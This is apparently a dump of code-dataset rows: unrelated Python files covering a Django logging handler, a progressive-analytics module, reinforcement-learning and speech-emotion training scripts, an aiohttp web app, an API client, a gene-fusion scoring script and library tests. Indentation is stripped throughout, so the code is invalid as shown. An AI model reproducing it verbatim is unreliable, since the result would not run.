created_at__lte=current - config.unspecified.max_age
).delete()
if config.request.max_age:
RequestEvent.objects.filter(
created_at__lte=current - config.request.max_age
).delete()
def save(self, instance=None, commit=True, clear=True):
"""
Internal save procedure.
Handles deletion when an event exceeds max_age
and batch saving via atomic transactions.
:return: None
"""
from django.db import transaction
from automated_logging.settings import settings
if instance:
self.instances[instance.pk] = instance
if len(self.instances) < self.limit:
if clear:
self._clear(settings)
return instance
if not commit:
return instance
def database(instances, config):
""" wrapper so that we can actually use threading """
with transaction.atomic():
[i.save() for k, i in instances.items()]
if clear:
self._clear(config)
instances.clear()
if self.threading:
thread = Thread(
group=None, target=database, args=(self.instances, settings)
)
thread.start()
else:
database(self.instances, settings)
return instance
def get_or_create(self, target: Type[Model], **kwargs) -> Tuple[Model, bool]:
"""
proxy for "get_or_create" from django,
instead of creating it immediately we
dd it to the list of objects to be created in a single swoop
:type target: Model to be get_or_create
:type kwargs: properties to be used to find and create the new object
"""
created = False
try:
instance = target.objects.get(**kwargs)
except ObjectDoesNotExist:
instance = target(**kwargs)
self.save(instance, commit=False, clear=False)
created = True
return instance, created
def prepare_save(self, instance: Model):
"""
Due to the nature of all modifications and such there are some models
that are in nature get_or_create and not creations
(we don't want so much additional data)
This is a recursive function that looks for relationships and
replaces specific values with their get_or_create counterparts.
:param instance: model
:return: instance that is suitable for saving
"""
from automated_logging.models import (
Application,
ModelMirror,
ModelField,
ModelEntry,
)
if isinstance(instance, Application):
return Application.objects.get_or_create(name=instance.name)[0]
elif isinstance(instance, ModelMirror):
return self.get_or_create(
ModelMirror,
name=instance.name,
application=self.prepare_save(instance.application),
)[0]
elif isinstance(instance, ModelField):
entry, _ = self.get_or_create(
ModelField,
name=instance.name,
mirror=self.prepare_save(instance.mirror),
)
if entry.type != instance.type:
entry.type = instance.type
self.save(entry, commit=False, clear=False)
return entry
elif isinstance(instance, ModelEntry):
entry, _ = self.get_or_create(
ModelEntry,
mirror=self.prepare_save(instance.mirror),
primary_key=instance.primary_key,
)
if entry.value != instance.value:
entry.value = instance.value
self.save(entry, commit=False, clear=False)
return entry
# ForeignObjectRel is untouched rn
for field in [
f
for f in instance._meta.get_fields()
if isinstance(f, ForeignObject)
and getattr(instance, f.name, None) is not None
# check the attribute module really being automated_logging
# to make sure that we do not follow down a rabbit hole
and getattr(instance, f.name).__class__.__module__.split('.', 1)[0]
== 'automated_logging'
]:
setattr(
instance, field.name, self.prepare_save(getattr(instance, field.name))
)
self.save(instance, commit=False, clear=False)
return instance
def unspecified(self, record: LogRecord) -> None:
"""
This is for messages that are not sent from django-automated-logging.
The option to still save these log messages is there. We create
the event in the handler and then save them.
:param record:
:return:
"""
from automated_logging.models import UnspecifiedEvent, Application
from automated_logging.signals import unspecified_exclusion
from django.apps import apps
event = UnspecifiedEvent()
if hasattr(record, 'message'):
event.message = record.message
event.level = record.levelno
event.line = record.lineno
event.file = Path(record.pathname)
# this is semi-reliable, but I am unsure of a better way to do this.
applications = apps.app_configs.keys()
path = Path(record.pathname)
candidates = [p for p in path.parts if p in applications]
if candidates:
# use the last candidate (closest to file)
event.application = Application(name=candidates[-1])
elif record.module in applications:
# if we cannot find the application, we use the module as application
event.application = Application(name=record.module)
else:
# if we cannot determine the application from the application
# or from the module we presume that the application is unknown
event.application = Application(name=None)
if not unspecified_exclusion(event):
self.prepare_save(event)
self.save(event)
def model(
self,
record: LogRecord,
event: 'ModelEvent',
modifications: List['ModelValueModification'],
data: Dict[str, Any],
) -> None:
"""
This is for model specific logging events.
Compiles the information into an event and saves that event
and all modifications done.
:param event:
:param modifications:
:param record:
:param data:
:return:
"""
self.prepare_save(event)
self.save(event)
for modification in modifications:
modification.event = event
self.prepare_save(modification)
self.save()
def m2m(
self,
record: LogRecord,
event: 'ModelEvent',
relationships: List['ModelRelationshipModification'],
data: Dict[str, Any],
) -> None:
self.prepare_save(event)
self.save(event)
for relationship in relationships:
relationship.event = event
self.prepare_save(relationship)
self.save(relationship)
def request(self, record: LogRecord, event: 'RequestEvent') -> None:
"""
The request event already has a model prepared that we just
need to prepare and save.
:param record: LogRecord
:param event: Event supplied via the LogRecord
:return: nothing
"""
self.prepare_save(event)
self.save(event)
def emit(self, record: LogRecord) -> None:
"""
Emit function that gets triggered for every log message in scope.
The record will be processed according to the action set.
:param record:
:return:
"""
if not hasattr(record, 'action'):
return self.unspecified(record)
if record.action == 'model':
return self.model(record, record.event, record.modifications, record.data)
elif record.action == 'model[m2m]':
return self.m2m(record, record.event, record.relationships, record.data)
elif record.action == 'request':
return self.request(record, record.event)
|
501314
|
from ..core import aio
from progressivis import ProgressiveError
from ..table.module import TableModule
from ..utils.psdict import PsDict
class DynVar(TableModule):
def __init__(self, init_val=None, vocabulary=None, **kwds):
super().__init__(**kwds)
self._has_input = False
if not (vocabulary is None or isinstance(vocabulary, dict)):
raise ProgressiveError('vocabulary must be a dictionary')
self._vocabulary = vocabulary
if not (init_val is None or isinstance(init_val, dict)):
raise ProgressiveError('init_val must be a dictionary')
self._table = PsDict({} if init_val is None else init_val)
def is_input(self):
return True
def has_input(self):
return self._has_input
def run_step(self,run_number, step_size, howlong):
return self._return_run_step(self.state_blocked, steps_run=1)
#raise StopIteration()
async def from_input(self, input_):
#import pdb;pdb.set_trace()
if not isinstance(input_, dict):
raise ProgressiveError('Expecting a dictionary')
last = PsDict(self._table) # shallow copy
values = input_
if self._vocabulary is not None:
values = {self._vocabulary[k]: v for k, v in values.items()}
for (k, v) in input_.items():
last[k] = v
await self.scheduler().for_input(self)
#last['_update'] = run_number
self._table.update(values)
self._has_input = True
await aio.sleep(0)
return ''
|
501317
|
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from DeepRL.Agent import DoubleDQNAgent
from DeepRL.Env.gym_wrapper import CartPoleEnv
from DeepRL.Replay import NaiveReplay
from DeepRL.Train import Train
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
class Model(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(4, 4)
self.fc2 = nn.Linear(4, 2)
def forward(self, x: torch.Tensor):
x = F.tanh(self.fc1(x))
x = self.fc2(x)
return x
if __name__ == '__main__':
model = Model()
agent = DoubleDQNAgent(
_model=model, _env=CartPoleEnv(),
_gamma=0.9, _batch_size=32,
_epsilon_init=1.0, _epsilon_decay=0.9999,
_epsilon_underline=0.1,
_replay=NaiveReplay(),
_optimizer=optim.SGD(model.parameters(), 0.001, 0.9)
)
agent.config.epoch_show_log = 100
train = Train(
agent,
_epoch_max=10000,
_step_init=100,
_step_train=1,
_step_update_target=1000,
_step_save=10000000,
)
train.run()
|
501365
|
import os
import argparse
import numpy as np
from pytorch_lightning import Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from utils.outputlib import WriteConfusionSeaborn
import torch
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-4)
parser.add_argument('--max_epochs', type=int, default=15)
parser.add_argument('--maxseqlen', type=float, default=10)
parser.add_argument('--nworkers', type=int, default=4)
parser.add_argument('--precision', type=int, choices=[16, 32], default=32)
parser.add_argument('--saving_path', type=str, default='downstream/checkpoints/custom')
parser.add_argument('--datadir', type=str, required=True)
parser.add_argument('--labeldir', type=str, required=True)
parser.add_argument('--pretrained_path', type=str, default=None)
parser.add_argument('--model_type', type=str, choices=['wav2vec', 'wav2vec2'], default='wav2vec2')
parser.add_argument('--save_top_k', type=int, default=1)
parser.add_argument('--num_exps', type=int, default=1)
parser.add_argument('--outputfile', type=str, default=None)
args = parser.parse_args()
hparams = args
from downstream.Custom.trainer import DownstreamGeneral
if not os.path.exists(hparams.saving_path):
os.makedirs(hparams.saving_path)
nfolds = len(os.listdir(hparams.labeldir))
for foldlabel in os.listdir(hparams.labeldir):
assert foldlabel[-5:] == '.json'
metrics, confusion = np.zeros((4, args.num_exps, nfolds)), 0.
for exp in range(args.num_exps):
for ifold, foldlabel in enumerate(os.listdir(hparams.labeldir)):
print (f"Running experiment {exp+1} / {args.num_exps}, fold {ifold+1} / {nfolds}...")
hparams.labelpath = os.path.join(hparams.labeldir, foldlabel)
model = DownstreamGeneral(hparams)
checkpoint_callback = ModelCheckpoint(
dirpath=hparams.saving_path,
filename='{epoch:02d}-{valid_loss:.3f}-{valid_UAR:.5f}' if hasattr(model, 'valid_met') else None,
save_top_k=args.save_top_k if hasattr(model, 'valid_met') else 0,
verbose=True,
save_weights_only=True,
monitor='valid_UAR' if hasattr(model, 'valid_met') else None,
mode='max'
)
trainer = Trainer(
precision=args.precision,
amp_backend='native',
callbacks=[checkpoint_callback] if hasattr(model, 'valid_met') else None,
checkpoint_callback=hasattr(model, 'valid_met'),
resume_from_checkpoint=None,
check_val_every_n_epoch=1,
max_epochs=hparams.max_epochs,
num_sanity_val_steps=2 if hasattr(model, 'valid_met') else 0,
gpus=1,
logger=False
)
trainer.fit(model)
if hasattr(model, 'valid_met'):
trainer.test()
else:
trainer.test(model)
met = model.test_met
metrics[:, exp, ifold] = np.array([met.uar*100, met.war*100, met.macroF1*100, met.microF1*100])
confusion += met.m
outputstr = "+++ SUMMARY +++\n"
for nm, metric in zip(('UAR [%]', 'WAR [%]', 'macroF1 [%]', 'microF1 [%]'), metrics):
outputstr += f"Mean {nm}: {np.mean(metric):.2f}\n"
outputstr += f"Fold Std. {nm}: {np.mean(np.std(metric, 1)):.2f}\n"
outputstr += f"Fold Median {nm}: {np.mean(np.median(metric, 1)):.2f}\n"
outputstr += f"Run Std. {nm}: {np.std(np.mean(metric, 1)):.2f}\n"
outputstr += f"Run Median {nm}: {np.median(np.mean(metric, 1)):.2f}\n"
if args.outputfile:
with open(args.outputfile, 'w') as f:
f.write(outputstr)
else:
print (outputstr)
#This may cause trouble if emotion categories are not consistent across folds?
WriteConfusionSeaborn(
confusion,
model.dataset.emoset,
os.path.join(args.saving_path, 'confmat.png')
)
|
501384
|
import asyncio
import logging
import pathlib
import aiohttp_jinja2
import jinja2
from aiohttp import web
from aiohttp_security import setup as setup_security
from aiohttp_security import CookiesIdentityPolicy
from motortwit.routes import setup_routes
from motortwit.security import AuthorizationPolicy
from motortwit.utils import (format_datetime, init_mongo, load_config,
robo_avatar_url)
from motortwit.views import SiteHandler
PROJ_ROOT = pathlib.Path(__file__).parent.parent
TEMPLATES_ROOT = pathlib.Path(__file__).parent / 'templates'
async def setup_mongo(app, conf, loop):
mongo = await init_mongo(conf['mongo'], loop)
async def close_mongo(app):
mongo.client.close()
app.on_cleanup.append(close_mongo)
return mongo
def setup_jinja(app):
jinja_env = aiohttp_jinja2.setup(
app, loader=jinja2.FileSystemLoader(str(TEMPLATES_ROOT)))
jinja_env.filters['datetimeformat'] = format_datetime
jinja_env.filters['robo_avatar_url'] = robo_avatar_url
async def init(loop):
conf = load_config(PROJ_ROOT / 'config' / 'config.yml')
app = web.Application(loop=loop)
mongo = await setup_mongo(app, conf, loop)
setup_jinja(app)
setup_security(app, CookiesIdentityPolicy(), AuthorizationPolicy(mongo))
# setup views and routes
handler = SiteHandler(mongo)
setup_routes(app, handler, PROJ_ROOT)
host, port = conf['host'], conf['port']
return app, host, port
async def get_app():
"""Used by aiohttp-devtools for local development."""
import aiohttp_debugtoolbar
app, _, _ = await init(asyncio.get_event_loop())
aiohttp_debugtoolbar.setup(app)
return app
def main():
logging.basicConfig(level=logging.DEBUG)
loop = asyncio.get_event_loop()
app, host, port = loop.run_until_complete(init(loop))
web.run_app(app, host=host, port=port)
if __name__ == '__main__':
main()
|
501406
|
from amadeus.client.decorator import Decorator
class Activity(Decorator, object):
def __init__(self, client, activity_id):
Decorator.__init__(self, client)
self.activity_id = activity_id
def get(self, **params):
'''
Returns a single activity from a given id.
.. code-block:: python
client.shopping.activities('4615').get()
:rtype: amadeus.Response
:raises amadeus.ResponseError: if the request could not be completed
'''
return self.client.get('/v1/shopping/activities/{0}'
.format(self.activity_id), **params)
|
501463
|
import os,re,glob
import numpy as np
from collections import defaultdict
import subprocess
import pandas as pd
RNA_dict = {'SRR3184279':'Pt1','SRR3184280':'Pt2','SRR3184281':'Pt4','SRR3184282':'Pt5','SRR3184283':'Pt6',
'SRR3184284': 'Pt7','SRR3184285':'Pt8','SRR3184286':'Pt9','SRR3184287':'Pt10','SRR3184288':'Pt12',
'SRR3184289': 'Pt13','SRR3184290':'Pt14','SRR3184291':'Pt15','SRR3184292':'Pt16','SRR3184293':'Pt19',
'SRR3184294': 'Pt20','SRR3184295':'Pt22','SRR3184296':'Pt23','SRR3184297':'Pt25','SRR3184300':'Pt28',
'SRR3184301':'Pt29','SRR3184302':'Pt31','SRR3184303':'Pt32','SRR3184304': 'Pt35','SRR3184305':'Pt37',
'SRR3184306':'Pt38'}
SRRs = ['SRR3184279', 'SRR3184280', 'SRR3184281', 'SRR3184282', 'SRR3184283', 'SRR3184284', 'SRR3184285', 'SRR3184286',
'SRR3184287', 'SRR3184288', 'SRR3184289', 'SRR3184290', 'SRR3184291', 'SRR3184292', 'SRR3184293', 'SRR3184294',
'SRR3184295', 'SRR3184296', 'SRR3184297', 'SRR3184300', 'SRR3184301', 'SRR3184302', 'SRR3184303', 'SRR3184304',
'SRR3184305', 'SRR3184306']
Pts = ['Pt1', 'Pt2', 'Pt4', 'Pt5', 'Pt6', 'Pt7', 'Pt9', 'Pt10', 'Pt12', 'Pt13', 'Pt14', 'Pt15', 'Pt16',
'Pt19', 'Pt20', 'Pt22', 'Pt23', 'Pt25', 'Pt28', 'Pt29', 'Pt31', 'Pt32', 'Pt35', 'Pt37', 'Pt38']
kmers = [9,10,11]
def cal(x):
return 1 / (1 + np.exp(5 *(x-2)))
def f1(Rm,Rn,self_similar,H,R,A,mismatch,comb):
score = Rm * (1 - Rn / 2 ** mismatch) * R * comb * H
return score
def getfusionScore():
mydict = {}
for Pt in Pts:
filein = '/home/wzt/project/GeneFusion/Data2/{}/fusion_score.tsv'.format(Pt)
if not os.path.isfile(filein):
continue
with open(filein,'r') as fin:
fin.readline()
for line in fin:
lines = line.strip().split('\t')
if len(lines[3]) not in kmers:
continue
Rm = cal(float(lines[6]))
Rn = cal(float(lines[11]))
R = float(lines[15])
A = float(lines[16])
self_similar,H,mismatch, comb = map(float,[lines[14],lines[13],lines[2],lines[7]])
score = f1(Rm=Rm,Rn=Rn,self_similar = self_similar,H=H,R=R,mismatch=mismatch,comb=comb,A=A)
if score < 0:
score = 0
mydict[Pt] = mydict.get(Pt,0) + score
return mydict
def getSNVIndelScore():
mydict = {}
for Pt in Pts:
filein = '/home/wzt/project/GeneFusion/Data2/{}/{}.filter.mupexi'.format(Pt,Pt)
with open(filein,'r') as fin:
fin.readline()
for line in fin:
lines = line.strip().split('\t')
if len(lines[3]) not in kmers:
continue
Rm = cal(float(lines[6]))
Rn = cal(float(lines[11]))
R = float(lines[15])
A = float(lines[16])
self_similar,H,mismatch, comb = map(float,[lines[14],lines[13],lines[2],lines[7]])
score = f1(Rm=Rm,Rn=Rn,self_similar = self_similar,H=H,R=R,mismatch=mismatch,comb=comb,A = A)
if score < 0:
score = 0
mydict[Pt] = mydict.get(Pt,0) + score
return mydict
def main():
myPFS = {}
fileout ='/home/wzt/project/GeneFusion/Data2/results/OS_91011_Score_CTL.tsv'
fusion_dict = getfusionScore()
SNVIndel_dict = getSNVIndelScore()
filein = '/home/wzt/project/GeneFusion/Data2/Sample_State_1.tsv'
with open(filein,'r') as fin:
fin.readline()
for line in fin:
lines = line.strip().split('\t')
if lines[0] == 'Pt8':
continue
myPFS[lines[0]] = '\t'.join((lines[3],str(float(lines[1])/30),lines[2],lines[4],lines[5],lines[6])) ### CTL
with open(fileout,'w') as fout:
fout.write('Patient\tgroup\tOS\tEvent\tCTL\tGender\tAge\tFusion\tSNVIndel\n')
for Pat in Pts:
Fusion_score = str(fusion_dict.get(Pat,0))
SNV_score = str(SNVIndel_dict.get(Pat,0))
fout.write('{}\t{}\t{}\t{}\n'.format(Pat,myPFS[Pat],Fusion_score,SNV_score))
main()
|
501573
|
import ctypes
import os
import mobula
from mobula.testing import assert_almost_equal, gradcheck
def test_custom_struct():
class MyStruct(ctypes.Structure):
_fields_ = [
('hello', ctypes.c_int),
('mobula', ctypes.c_float),
]
mobula.glue.register_cstruct('MyStruct', MyStruct)
mobula.op.load('MyStruct', os.path.dirname(__file__))
res = mobula.func.hello((42, 39))
assert_almost_equal(res, 42 + 39)
def test_custom_ctensor():
class CTensor(ctypes.Structure):
_fields_ = [
('data', ctypes.POINTER(ctypes.c_float)),
('size', ctypes.c_int),
]
def CTensorConstructor(var):
glue_mod = mobula.glue.backend.get_var_glue(var)
tensor = glue_mod.Tensor(var)
data_ptr = ctypes.cast(tensor.data_ptr, ctypes.POINTER(ctypes.c_float))
return CTensor(data_ptr, var.size)
mobula.glue.register_cstruct('CTensor', CTensor, CTensorConstructor)
mobula.op.load('CTensor', os.path.dirname(__file__))
import numpy as np
x = np.array([1, 2, 3], dtype=np.float32)
y = x + 1
mobula.func.ctensor_inc(1, x)
assert_almost_equal(y, x)
def test_build_path():
new_build_path = os.path.join(os.path.dirname(__file__), 'a_new_path')
old_build_path = mobula.config.BUILD_PATH
with mobula.config.TempConfig(BUILD_PATH=new_build_path, BUILD_IN_LOCAL_PATH=False):
mobula.config.BUILD_PATH = new_build_path
module_name = 'BuildPath'
mobula.op.load(module_name, os.path.dirname(__file__))
res = mobula.func.TestBuildPath()
assert res == 42
def build_existed(path, module_name):
dirname = os.path.join(path, 'build')
if not os.path.isdir(dirname):
return False
for name in os.listdir(dirname):
if name.startswith(module_name):
return True
return False
assert not build_existed(old_build_path, module_name)
assert build_existed(new_build_path, module_name)
def test_template_build():
with mobula.config.TempConfig(BUILD_IN_LOCAL_PATH=True):
mobula.op.load('./test_template', os.path.dirname(__file__))
mobula.func.mul_elemwise.build('cpu', ['float'])
mobula.func.mul_elemwise.build('cpu', dict(T='int'))
assert mobula.config.BUILD_IN_LOCAL_PATH == True
env_path = os.path.dirname(__file__)
code_fname = os.path.join(
env_path,
'test_template', 'build', 'cpu', 'test_template_wrapper.cpp')
code = open(code_fname).read()
'''
In windows, `ctypes.c_int` is the same as `ctypes.c_long`, whose name is `c_long`. The function of `get_ctype_name` will return `int32_t` :(
'''
assert 'mul_elemwise_kernel<float>' in code, code
assert 'mul_elemwise_kernel<int' in code, code
if __name__ == '__main__':
test_custom_struct()
test_custom_ctensor()
test_build_path()
test_template_build()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.